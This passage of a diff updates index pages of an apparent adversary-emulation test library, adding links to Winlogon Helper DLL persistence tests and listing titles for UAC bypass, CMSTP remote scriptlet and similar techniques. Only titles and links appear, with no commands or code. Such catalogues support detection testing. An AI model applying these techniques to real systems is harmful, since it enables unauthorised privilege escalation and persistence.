- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- [T1191 CMSTP](./T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -140,6 +143,9 @@
- Atomic Test #1: Application Shim Installation [windows]
- [T1088 Bypass User Account Control](./T1088/T1088.md)
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -252,7 +258,10 @@
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
# discovery
- [T1087 Account Discovery](./T1087/T1087.md)
atomics/windows-matrix.md
+1 -1
View File
@@ -42,7 +42,7 @@
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | | | [Signed Binary Proxy Execution](./T1218/T1218.md) | | | | | | |